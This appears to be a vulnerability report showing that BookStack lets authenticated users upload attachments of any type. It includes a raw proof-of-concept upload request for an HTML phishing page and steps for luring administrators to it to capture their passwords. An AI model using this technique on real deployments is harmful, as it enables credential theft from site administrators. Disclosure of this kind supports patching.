During reading recent BookStack source code (31665410) I discovered no uploaded file type and size check. Authenticated user with attachment create role can upload any type file. One of possibilities is to upload phishing page and get administrators credentials.
POST /attachments/upload?uploaded_to=1 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------300959455021219094302820715478
Content-Length: 8071
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/books/new-name-book/page/nowa-strona-asdf/edit
Cookie: XSRF-TOKEN=eyJpdiI6ImFZNjR1bmp5d1BTWkFNQU83WFZXelE9PSIsInZhbHVlIjoiTFZ1OTZENzE0amR1emVBdEU4aGt3aEpYbEtieENkUGhmdXBCVlA4b1pMZ3BCb2xZN2haYVQ5Wkw5ZSs2c2tKXC9CbWc5bWFUcFJ4MTBDMmJORzdJXC8zTFhSTEV2dWk5NHl3R1JVd1ZEQTNyN09UQzY0Um5uQUx2Umc3UFdvNnlTUCIsIm1hYyI6IjlmODI1ZTYwMDcxNzdlNWFmMzYyZmYyNTFiM2I2OWE4YTQ0YWRiZWRkM2FhNzlmNzM1MTA0MzJhYjJhYmIxZTMifQ%3D%3D; bookstack_session=eyJpdiI6ImgwWndXajlMWkxlMTNKTlpJa1wvcDl3PT0iLCJ2YWx1ZSI6Ik1EdGZwdzdKNWxvS0lGS2g1bWZCcXcxOWd5amRNVTR1MWsrNGJwR28waXVoV2tIZ2QxT2RFOG5JaHplQlwvRUI2aWQ2ZkdIMnBSK1ZcL1RXNHRsSkVwdGNkcDBiTkFjTUo1ejY1N2dUaTlQNmx4aDhWMkdQcFhvSGpiaUFZQWFMQUkiLCJtYWMiOiIxNzlkMzgzODJiMzVlZjc4MzU4YzZmMTlhYmFiZWQ4NjgxMDA1NTAwNGMzMDc0NGM2ZThiMzMxZmNkOTViMjNiIn0%3D
-----------------------------300959455021219094302820715478
Content-Disposition: form-data; name="_token"
VUGoBgaUdmFPvl3XRKJLUaLJc5ETKEkhGinTNE3t
-----------------------------300959455021219094302820715478
Content-Disposition: form-data; name="file"; filename="phish.html"
Content-Type: text/html
[PHISHING PAGE SOURCE CODE]
-----------------------------300959455021219094302820715478--
Next step is to seduce user with higher privileges and abillity to read page with id 1 to see http://172.17.0.1:8888/attachments/[ID RETURNED BY POST]?open=true
Host phishing pages and get passwords of admin users